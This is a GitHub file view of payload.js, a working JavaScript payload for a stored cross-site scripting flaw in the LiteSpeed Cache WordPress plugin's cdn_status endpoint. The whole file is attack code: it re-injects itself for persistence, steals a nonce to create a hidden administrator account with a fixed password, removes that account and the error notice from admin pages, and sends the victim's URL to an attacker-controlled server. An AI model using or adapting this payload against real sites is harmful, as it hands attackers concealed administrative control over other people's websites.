-
Notifications
You must be signed in to change notification settings - Fork 0
/
payload.js
101 lines (85 loc) · 3.8 KB
/
payload.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
const SERVER_URL = "https://your.server";
const BASE_URL = window.location.href.split("wp-admin")[0];
const XSS = `<script src=${SERVER_URL}/admin-bar-reloaded.min.js></script>`;
const FALL_BACK_LOAD_PAGE_THRESHOLD_MS = 5000;
const NEW_ADMIN_USERNAME = "wp-config-user";
const NEW_ADMIN_PASSWORD = "somepassword123";
// ping the server with the URL and cookies of the victim
function pingServer(customData = "") {
const req = new XMLHttpRequest();
req.open("POST", `${SERVER_URL}/m`, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(`l=${encodeURIComponent(window.location.href)}&c=${encodeURIComponent(customData)}`);
}
// send the XSS request again so it's persistent
function sendXssRequestAgain() {
document.addEventListener("DOMContentLoaded", () => {
const req = new XMLHttpRequest();
req.open("POST", `${BASE_URL}wp-json/litespeed/v1/cdn_status`, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(`success=0&result[_msg]=${encodeURIComponent(XSS)}`);
});
}
// creates the new admin user
function createAdminUser() {
const baseAdminURL = `${BASE_URL}wp-admin`;
// get the nonce
let req = new XMLHttpRequest();
req.open("GET", `${baseAdminURL}/user-new.php`, false);
req.send();
const nonceMatch = /name="_wpnonce_create-user" value="([^"]+)"/.exec(req.responseText);
if (!nonceMatch) return;
const nonce = nonceMatch[1];
// create the new user
req = new XMLHttpRequest();
req.open("POST", `${baseAdminURL}/user-new.php`, false);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(
`action=createuser&_wpnonce_create-user=${nonce}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fuser-new.php&user_login=${NEW_ADMIN_USERNAME}&email=${NEW_ADMIN_USERNAME}%40config.com&first_name=&last_name=&url=&pass1=${NEW_ADMIN_PASSWORD}&pass2=${NEW_ADMIN_PASSWORD}&pw_weak=on&role=administrator&createuser=Add+New+User`
);
}
function hideUserAndPopup() {
document.addEventListener("DOMContentLoaded", () => {
// if they're on the users page, hide that we have created a new user
if (window.location.href.includes("/users.php") && window.location.href.includes("wp-admin")) {
// remove the user from the user list
document.querySelectorAll("#the-list tr").forEach((row) => {
if (row.innerHTML.includes("wp-config-user")) {
row.remove();
}
});
// decrement each user counter by 1
document.querySelectorAll(".wrap .count").forEach((row) => {
row.innerHTML = `(${parseInt(row.innerHTML.replace(/\D/g, "")) - 1})`;
});
// decrement "x items" count by one
document.querySelectorAll(".wrap .displaying-num").forEach((row) => {
row.innerHTML = `${parseInt(row.innerHTML.replace(/\D/g, "")) - 1} items`;
});
}
// remove the error popup (which loads the XSS)
document.querySelectorAll(".notice-error").forEach((element) => {
if (element.textContent.includes("There was an error during CDN setup:")) {
element.remove();
}
});
});
}
function setPageVisibility(visible) {
document.documentElement.style.display = visible ? "" : "none";
}
// hide the page while modifying the content
setPageVisibility(false);
// fallback to if our server is down or something doesn't load
setTimeout(() => setPageVisibility(true), FALL_BACK_LOAD_PAGE_THRESHOLD_MS);
try {
// run malicious functions
sendXssRequestAgain();
hideUserAndPopup();
setPageVisibility(true);
createAdminUser();
pingServer();
} catch (e) {
pingServer(e.message);
setPageVisibility(false);
}